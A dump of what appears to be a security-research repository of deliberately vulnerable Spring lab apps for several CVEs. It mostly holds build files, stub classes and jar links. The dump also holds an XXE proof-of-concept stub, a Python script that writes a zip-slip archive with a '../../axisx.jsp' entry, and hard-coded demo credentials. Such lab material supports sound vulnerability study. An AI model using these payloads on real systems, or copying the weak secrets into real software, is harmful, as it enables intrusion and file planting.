-------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- 
/CVE-2013-4152/web/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/standard.jar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/standard.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/xml-apis-1.4.01.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xml-apis-1.4.01.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/xml-resolver-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xml-resolver-1.2.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/xmlpull-1.1.3.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xmlpull-1.1.3.1.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/xmlschema-core-2.2.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xmlschema-core-2.2.1.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/xpp3_min-1.1.4c.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xpp3_min-1.1.4c.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/xstream-1.4.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xstream-1.4.6.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | CVE-2013-4152 8 | 9 | spring 10 | 11 | org.springframework.web.servlet.DispatcherServlet 12 | 13 | 1 14 | 15 | 16 | spring 17 | / 18 | 19 | 20 | 21 | index.jsp 22 | 23 | -------------------------------------------------------------------------------- /CVE-2013-4152/web/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | Created by IntelliJ IDEA. 3 | User: dxy 4 | Date: 2022/12/20 5 | Time: 3:29 下午 6 | To change this template use File | Settings | File Templates. 
7 | --%> 8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 9 | 10 | 11 | $Title$ 12 | 13 | 14 | CVE-2013-4152 15 | 16 | 17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/web/resources/poc.xml:
--------------------------------------------------------------------------------
1 | 2 | 4 | 5 | ]> 6 | &xxe;
--------------------------------------------------------------------------------
/CVE-2016-4977/src/main/java/com/example/DemoApplication.java:
--------------------------------------------------------------------------------
package com.example;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;
import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer;
import org.springframework.web.bind.annotation.RestController;

/**
 * Spring Boot entry point for the CVE-2016-4977 lab.
 *
 * <p>The single class is annotated as both an OAuth2 authorization server and a
 * resource server. It is also a {@code @RestController} but declares no handler
 * methods, so any endpoints are supplied by the framework rather than by this code.
 *
 * <p>NOTE(review): whether an instance is actually affected depends on the Spring
 * Security OAuth version declared in pom.xml, which is not part of this excerpt; for a
 * real deployment the fix is to upgrade that dependency. Client credentials, the user
 * password and the bind address come from application.properties.
 */
@SpringBootApplication
@RestController
@EnableResourceServer
@EnableAuthorizationServer
public class DemoApplication {

    /**
     * Starts the Spring application context.
     *
     * @param args command-line arguments, passed through to Spring Boot unchanged
     */
    public static void main(String[] args) {
        SpringApplication.run(DemoApplication.class, args);
    }
}

--------------------------------------------------------------------------------
/CVE-2016-4977/src/main/resources/application.properties:
--------------------------------------------------------------------------------
# NOTE(review): lab-only values. The client id/secret and the user password below are
# hard-coded, guessable and committed to the repository; never reuse them outside a
# disposable test instance, and load real secrets from the environment or a secret store.
security.oauth2.client.clientId: acme
security.oauth2.client.clientSecret: acmesecret
# The password grant is enabled alongside authorization_code and refresh_token.
security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password
security.oauth2.client.scope: openid
security.oauth2.client.registered-redirect-uri: http://localhost
security.user.password: password
server.port=8099
# NOTE(review): binds the listener to a specific private (10.0.0.0/8) address rather than
# loopback, so the deliberately vulnerable app is reachable from that network segment;
# keep it on an isolated lab network or bind to 127.0.0.1.
server.address=10.128.5.250
--------------------------------------------------------------------------------
/CVE-2016-4977/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | security.oauth2.client.clientId: acme 2 | security.oauth2.client.clientSecret: acmesecret 3 | security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password 4 | security.oauth2.client.scope: openid 5 | security.oauth2.client.registered-redirect-uri: http://localhost 6 | security.user.password: password 7 | server.port=8099 8 | server.address=10.128.5.250 -------------------------------------------------------------------------------- /CVE-2016-4977/target/classes/com/example/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2016-4977/target/classes/com/example/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2017-8046/build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'org.springframework.boot' version '2.7.0' 3 | id 'io.spring.dependency-management' version '1.0.11.RELEASE' 4 | id 'java' 5 | } 6 | 7 | group = 'com.example' 8 | version = '0.0.1-SNAPSHOT' 9 | sourceCompatibility = '1.8' 10 | 11 | repositories { 12 | mavenCentral() 13 | } 14 | 15 | dependencies { 16 | implementation 'org.springframework.boot:spring-boot-starter-data-jpa' 17 | implementation 'org.springframework.boot:spring-boot-starter-data-rest' 18 | runtimeOnly 'com.h2database:h2' 19 | testImplementation 'org.springframework.boot:spring-boot-starter-test' 20 | } 21 | 22 | test { 23 | useJUnitPlatform() 24 | } 25 | -------------------------------------------------------------------------------- /CVE-2017-8046/gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- 
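https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/CVE-2017-8046/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
# NOTE(review): no distributionSha256Sum is set, so the Gradle distribution
# fetched from distributionUrl is not checksum-verified by the wrapper.
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
distributionUrl=https\://services.gradle.org/distributions/gradle-7.4.2-bin.zip
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists

--------------------------------------------------------------------------------
/CVE-2017-8046/settings.gradle:
--------------------------------------------------------------------------------
rootProject.name = 'accessing-data-rest'

--------------------------------------------------------------------------------
/CVE-2017-8046/src/main/java/com/example/accessingdatarest/AccessingDataRestApplication.java:
--------------------------------------------------------------------------------
package com.example.accessingdatarest;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

/**
 * Spring Boot entry point for the data-REST sample in this directory.
 */
@SpringBootApplication
public class AccessingDataRestApplication {

    /**
     * Starts the application context.
     *
     * @param args command-line arguments, passed through to Spring Boot
     */
    public static void main(String[] args) {
        SpringApplication.run(AccessingDataRestApplication.class, args);
    }
}

--------------------------------------------------------------------------------
/CVE-2017-8046/src/main/java/com/example/accessingdatarest/Person.java:
--------------------------------------------------------------------------------
package com.example.accessingdatarest;

import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;

/**
 * JPA entity with a generated numeric id and two name fields.
 *
 * <p>Only the name fields have accessors; the id has no getter or setter.
 */
@Entity
public class Person {

    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private long id;

    private String firstName;
    private String lastName;

    public String getFirstName() {
        return firstName;
    }

    public void setFirstName(String firstName) {
        this.firstName = firstName;
    }

    public String getLastName() {
        return lastName;
    }

    public void setLastName(String lastName) {
        this.lastName = lastName;
    }
}

--------------------------------------------------------------------------------
/CVE-2017-8046/src/main/java/com/example/accessingdatarest/PersonRepository.java:
--------------------------------------------------------------------------------
package com.example.accessingdatarest;

import java.util.List;

import org.springframework.data.repository.PagingAndSortingRepository;
import org.springframework.data.repository.query.Param;
import org.springframework.data.rest.core.annotation.RepositoryRestResource;

/**
 * Repository for {@link Person}, exported as a REST resource under the path "people".
 *
 * <p>The type arguments were missing from the page (raw {@code PagingAndSortingRepository}
 * and raw {@code List}); they are restored from the entity above, whose id field is a
 * {@code long}.
 *
 * <p>NOTE(review): the build file shown for this directory declares no security starter, so
 * the exported resource presumably accepts unauthenticated requests. Keep it on an isolated
 * lab network, or add authentication and limit the exported methods before reusing it.
 */
@RepositoryRestResource(collectionResourceRel = "people", path = "people")
public interface PersonRepository extends PagingAndSortingRepository<Person, Long> {

    /**
     * Finds people by last name.
     *
     * @param name the last name to match, bound from the request parameter "name"
     * @return the matching people
     */
    List<Person> findByLastName(@Param("name") String name);

}

--------------------------------------------------------------------------------
/CVE-2017-8046/target/classes/com/example/accessingdatarest/AccessingDataRestApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/classes/com/example/accessingdatarest/AccessingDataRestApplication.class
--------------------------------------------------------------------------------
/CVE-2017-8046/target/classes/com/example/accessingdatarest/Person.class:
--------------------------------------------------------------------------------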
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/classes/com/example/accessingdatarest/Person.class -------------------------------------------------------------------------------- /CVE-2017-8046/target/classes/com/example/accessingdatarest/PersonRepository.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/classes/com/example/accessingdatarest/PersonRepository.class -------------------------------------------------------------------------------- /CVE-2017-8046/target/test-classes/com/example/accessingdatarest/AccessingDataRestApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/test-classes/com/example/accessingdatarest/AccessingDataRestApplicationTests.class -------------------------------------------------------------------------------- /CVE-2018-1259/src/main/java/example/users/Application.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015-2018 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package example.users; 17 | 18 | import org.springframework.boot.SpringApplication; 19 | import org.springframework.boot.autoconfigure.SpringBootApplication; 20 | 21 | /** 22 | * @author Oliver Gierke 23 | */ 24 | @SpringBootApplication 25 | public class Application { 26 | 27 | public static void main(String[] args) { 28 | SpringApplication.run(Application.class, args); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /CVE-2018-1259/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | logging.level.org.springframework.web.client=DEBUG 2 | server.address=10.128.5.250 3 | server.port=8099 4 | -------------------------------------------------------------------------------- /CVE-2018-1259/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | logging.level.org.springframework.web.client=DEBUG 2 | server.address=10.128.5.250 3 | server.port=8099 4 | -------------------------------------------------------------------------------- /CVE-2018-1259/target/classes/example/users/Application.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1259/target/classes/example/users/Application.class -------------------------------------------------------------------------------- /CVE-2018-1259/target/classes/example/users/UserController$UserPayload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1259/target/classes/example/users/UserController$UserPayload.class -------------------------------------------------------------------------------- 
/CVE-2018-1259/target/classes/example/users/UserController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1259/target/classes/example/users/UserController.class -------------------------------------------------------------------------------- /CVE-2018-1260/src/main/java/com/example/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer; 6 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer; 7 | import org.springframework.web.bind.annotation.RestController; 8 | 9 | @SpringBootApplication 10 | @RestController 11 | @EnableResourceServer 12 | @EnableAuthorizationServer 13 | public class DemoApplication { 14 | 15 | public static void main(String[] args) { 16 | SpringApplication.run(DemoApplication.class, args); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /CVE-2018-1260/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | security.oauth2.client.clientId: acme 2 | security.oauth2.client.clientSecret: acmesecret 3 | security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password 4 | security.oauth2.client.scope: openid 5 | security.oauth2.client.registered-redirect-uri: http://localhost 6 | security.user.password: password -------------------------------------------------------------------------------- /CVE-2018-1260/target/classes/application.properties: 
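--------------------------------------------------------------------------------
# NOTE(review): build-output copy of the CVE-2018-1260 application.properties.
# The client secret and the user password are literal demo values committed to
# the repository; real deployments should supply them from the environment or
# a secret store.
security.oauth2.client.clientId: acme
security.oauth2.client.clientSecret: acmesecret
security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password
security.oauth2.client.scope: openid
security.oauth2.client.registered-redirect-uri: http://localhost
security.user.password: password
--------------------------------------------------------------------------------
/CVE-2018-1260/target/classes/com/example/DefaultOAuth2RequestValidator.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1260/target/classes/com/example/DefaultOAuth2RequestValidator.class
--------------------------------------------------------------------------------
/CVE-2018-1260/target/classes/com/example/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1260/target/classes/com/example/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2018-1260/target/classes/com/example/OAuthSecurityConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1260/target/classes/com/example/OAuthSecurityConfig.class
--------------------------------------------------------------------------------
/CVE-2018-1261/HELP.md:
--------------------------------------------------------------------------------
# Getting Started

### Reference Documentation
For further reference, please consider the following sections:

* [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
* [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/)
* [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/#build-image)
* [Spring Integration Test Module Reference Guide](https://docs.spring.io/spring-integration/reference/html/testing.html)
* [Spring Integration](https://docs.spring.io/spring-boot/docs/2.6.9/reference/htmlsingle/#messaging.spring-integration)

### Guides
The following guides illustrate how to use some features concretely:

* [Integrating Data](https://spring.io/guides/gs/integration/)


--------------------------------------------------------------------------------
/CVE-2018-1261/cve_2018_1261.py:
--------------------------------------------------------------------------------
"""Writes the test archive used by the CVE-2018-1261 sample project.

The single entry is named with parent-directory segments, so the archive
exercises entry-path handling in whatever unpacks it. An extractor should
resolve each entry name against its target directory and refuse any entry
whose resolved path falls outside that directory.
"""
import zipfile

if __name__ == "__main__":
    binary = b'this is a axisx test'
    # Mode "a" appends: running the script again adds a duplicate entry to an
    # existing test.zip rather than recreating the file.
    # The context manager closes the archive even if writestr() fails; the
    # original closed it only on success, and its except clause only re-raised.
    with zipfile.ZipFile("./src/main/resources/test.zip", "a", zipfile.ZIP_DEFLATED) as zipFile:
        zipFile.writestr("../../axisx.jsp", binary)
--------------------------------------------------------------------------------
/CVE-2018-1261/src/main/java/com/example/demo/ZipHeaders.java:
--------------------------------------------------------------------------------
/*
 * Copyright 2015-2016 the original author or authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.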
6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | package com.example.demo; 17 | 18 | /** 19 | * Zip adapter specific message headers. 20 | * @author Gunnar Hillert 21 | * @since 1.0 22 | */ 23 | public abstract class ZipHeaders { 24 | 25 | public static final String PREFIX = "zip_"; 26 | 27 | public static final String ZIP_ENTRY_FILE_NAME = PREFIX + "entryFilename"; 28 | 29 | public static final String ZIP_ENTRY_PATH = PREFIX + "entryPath"; 30 | 31 | public static final String ZIP_ENTRY_LAST_MODIFIED_DATE = PREFIX + "entryLastModifiedDate"; 32 | 33 | } 34 | -------------------------------------------------------------------------------- /CVE-2018-1261/src/main/java/com/example/demo/ZipResultType.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015-2016 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package com.example.demo; 17 | 18 | /** 19 | * @author Gunnar Hillert 20 | * @since 1.0 21 | */ 22 | public enum ZipResultType { 23 | 24 | FILE, BYTE_ARRAY 25 | 26 | } 27 | -------------------------------------------------------------------------------- /CVE-2018-1261/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /CVE-2018-1261/src/main/resources/test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/src/main/resources/test.zip -------------------------------------------------------------------------------- /CVE-2018-1261/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | //package com.example.demo; 2 | // 3 | //import org.junit.jupiter.api.Test; 4 | //import org.springframework.boot.test.context.SpringBootTest; 5 | // 6 | //@SpringBootTest 7 | //class DemoApplicationTests { 8 | // 9 | // @Test 10 | // void contextLoads() { 11 | // } 12 | // 13 | //} 14 | -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/AbstractZipTransformer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/AbstractZipTransformer.class 
-------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/SpringZipUtils.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/SpringZipUtils.class -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer$1.class -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer.class -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/ZipHeaders.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/ZipHeaders.class 
-------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/ZipResultType.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/ZipResultType.class -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/com/example/demo/ZipTransformer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/ZipTransformer.class -------------------------------------------------------------------------------- /CVE-2018-1261/target/classes/test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/test.zip -------------------------------------------------------------------------------- /CVE-2018-1270/build.gradle: -------------------------------------------------------------------------------- 1 | buildscript { 2 | repositories { 3 | mavenCentral() 4 | } 5 | dependencies { 6 | classpath("org.springframework.boot:spring-boot-gradle-plugin:2.0.0.RELEASE") 7 | } 8 | } 9 | 10 | apply plugin: 'java' 11 | apply plugin: 'eclipse' 12 | apply plugin: 'org.springframework.boot' 13 | apply plugin: 'io.spring.dependency-management' 14 | 15 | jar { 16 | baseName = 'gs-messaging-stomp-websocket' 17 | version = '0.1.0' 18 | } 19 | sourceCompatibility = 1.8 20 | targetCompatibility = 1.8 21 | 22 | repositories { 23 | mavenCentral() 24 | } 25 | 26 | dependencies { 27 | compile("org.springframework.boot:spring-boot-starter-websocket") 28 | compile("org.webjars:webjars-locator-core") 
// (continuation of the dependencies block of /CVE-2018-1270/build.gradle)
    compile("org.webjars:sockjs-client:1.0.2")
    compile("org.webjars:stomp-websocket:2.3.3")
    compile("org.webjars:bootstrap:3.3.7")
    compile("org.webjars:jquery:3.1.0")

    testCompile("org.springframework.boot:spring-boot-starter-test")
}


--------------------------------------------------------------------------------
/CVE-2018-1270/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/CVE-2018-1270/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
#Thu Mar 01 09:09:11 CST 2018
# NOTE(review): no distributionSha256Sum is set, so the Gradle distribution
# fetched from distributionUrl is not checksum-verified by the wrapper.
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
distributionUrl=https\://services.gradle.org/distributions/gradle-4.6-bin.zip

--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/Application.java:
--------------------------------------------------------------------------------
package hello;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

/**
 * Spring Boot entry point for the STOMP-over-WebSocket sample.
 */
@SpringBootApplication
public class Application {

    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }
}

--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/Greeting.java:
--------------------------------------------------------------------------------
package hello;

/**
 * Outbound message carrying the greeting text.
 */
public class Greeting {

    private String content;

    public Greeting() {
    }

    public Greeting(String content) {
        this.content = content;
    }

    public String getContent() {
        return content;
    }

}

--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/GreetingController.java:
--------------------------------------------------------------------------------
package hello;

import org.springframework.messaging.handler.annotation.MessageMapping;
import org.springframework.messaging.handler.annotation.SendTo;
import org.springframework.stereotype.Controller;

/**
 * Message handler that answers each "/hello" message with a greeting on "/topic/greetings".
 */
@Controller
public class GreetingController {

    /**
     * Builds the greeting for an inbound message.
     *
     * @param message inbound payload; only its name is read
     * @return a greeting of the form {@code Hello, <name>!}
     * @throws Exception declared because of the {@code Thread.sleep} call
     */
    @MessageMapping("/hello")
    @SendTo("/topic/greetings")
    public Greeting greeting(HelloMessage message) throws Exception {
        Thread.sleep(1000); // simulated delay
        // NOTE(review): the name is client-supplied and is relayed unescaped to every
        // subscriber of the topic; whatever renders it must encode it for its output context.
        final String text = "Hello, " + message.getName() + "!";
        return new Greeting(text);
    }

}

--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/HelloMessage.java:
